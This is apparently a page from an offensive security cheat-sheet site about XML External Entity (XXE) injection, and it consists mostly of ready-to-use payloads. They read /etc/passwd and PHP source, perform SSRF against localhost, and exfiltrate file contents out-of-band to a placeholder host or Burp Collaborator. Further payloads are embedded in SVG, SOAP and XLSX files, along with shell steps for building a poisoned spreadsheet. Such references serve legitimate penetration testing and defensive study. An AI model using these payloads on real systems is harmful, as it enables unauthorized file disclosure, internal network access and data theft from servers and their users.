pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By GitBook
XML External Entity (XXE)

Exploiting XXE to retrieve files

Classic XXE

Display content of /etc/passwd.
1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
Copied!
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Copied!

Classic XXE Base64 encoded

Base64 string == file://etc/passwd
1
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
Copied!

PHP Wrapper inside XXE

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
5
]>
6
<foo>&xxe;</foo>
Copied!

Xinclude attack

1
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
2
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Copied!

Exploiting XXE to perform SSRF attacks

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "http://127.0.0.1:5000/secret_pass.txt" >
5
]>
6
<foo>&xxe;</foo>
Copied!

Exploiting blind XXE to exfiltrate data out-of-band

Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.

Blind XXE

The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
1
<?xml version="1.0" ?>
2
<!DOCTYPE root [
3
<!ENTITY % ext SYSTEM "http://YOURBURCOLLABORATOR.net/x"> %ext;
4
]>
5
<r></r>
Copied!
Send the content of /etc/passwd to www.web.com (you may receive only the first line).
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
5
<!ENTITY callhome SYSTEM "www.web.com/?%xxe;">
6
]
7
>
8
<foo>&callhome;</foo>
Copied!

XXE in weird files

XXE inside SVG

1
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
2
<image xlink:href="expect://ls" width="200" height="200"></image>
3
</svg>
Copied!

XXE inside SOAP

1
<soap:Body>
2
<foo>
3
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
4
</foo>
5
</soap:Body>
Copied!

XXE inside XLSX file

Extract the excel file.
1
$ mkdir XXE && cd XXE
2
$ unzip ../XXE.xlsx
3
Archive: ../XXE.xlsx
4
inflating: xl/drawings/drawing1.xml
5
inflating: xl/worksheets/sheet1.xml
6
inflating: xl/worksheets/_rels/sheet1.xml.rels
7
inflating: xl/sharedStrings.xml
8
inflating: xl/styles.xml
9
inflating: xl/workbook.xml
10
inflating: xl/_rels/workbook.xml.rels
11
inflating: _rels/.rels
12
inflating: [Content_Types].xml
Copied!
Add your blind XXE payload inside xl/workbook.xml.
1
<xml...>
2
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
3
<x>&xxe;</x>
4
<workbook...>
Copied!
Alternativly, add your payload in xl/sharedStrings.xml:
1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
3
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
Copied!
Rebuild the Excel file.
1
$ zip -r ../poc.xlsx *
2
updating: [Content_Types].xml (deflated 71%)
3
updating: _rels/ (stored 0%)
4
updating: _rels/.rels (deflated 60%)
5
updating: docProps/ (stored 0%)
6
updating: docProps/app.xml (deflated 51%)
7
updating: docProps/core.xml (deflated 50%)
8
updating: xl/ (stored 0%)
9
updating: xl/workbook.xml (deflated 56%)
10
updating: xl/worksheets/ (stored 0%)
11
updating: xl/worksheets/sheet1.xml (deflated 53%)
12
updating: xl/styles.xml (deflated 60%)
13
updating: xl/theme/ (stored 0%)
14
updating: xl/theme/theme1.xml (deflated 80%)
15
updating: xl/_rels/ (stored 0%)
16
updating: xl/_rels/workbook.xml.rels (deflated 66%)
17
updating: xl/sharedStrings.xml (deflated 17%)
Copied!

References

PayloadsAllTheThings/XXE Injection at master · swisskyrepo/PayloadsAllTheThings
GitHub
XXE Payloads Repository
WEB ATTACKS - Previous
Server Side Template Injection (SSTI)
Next - SHELLS
Misc
Last modified 7mo ago
Copy link
Contents
Exploiting XXE to retrieve files
Classic XXE
Classic XXE Base64 encoded
PHP Wrapper inside XXE
Xinclude attack
Exploiting XXE to perform SSRF attacks
Exploiting blind XXE to exfiltrate data out-of-band
Blind XXE
XXE in weird files
XXE inside SVG
XXE inside SOAP
XXE inside XLSX file
References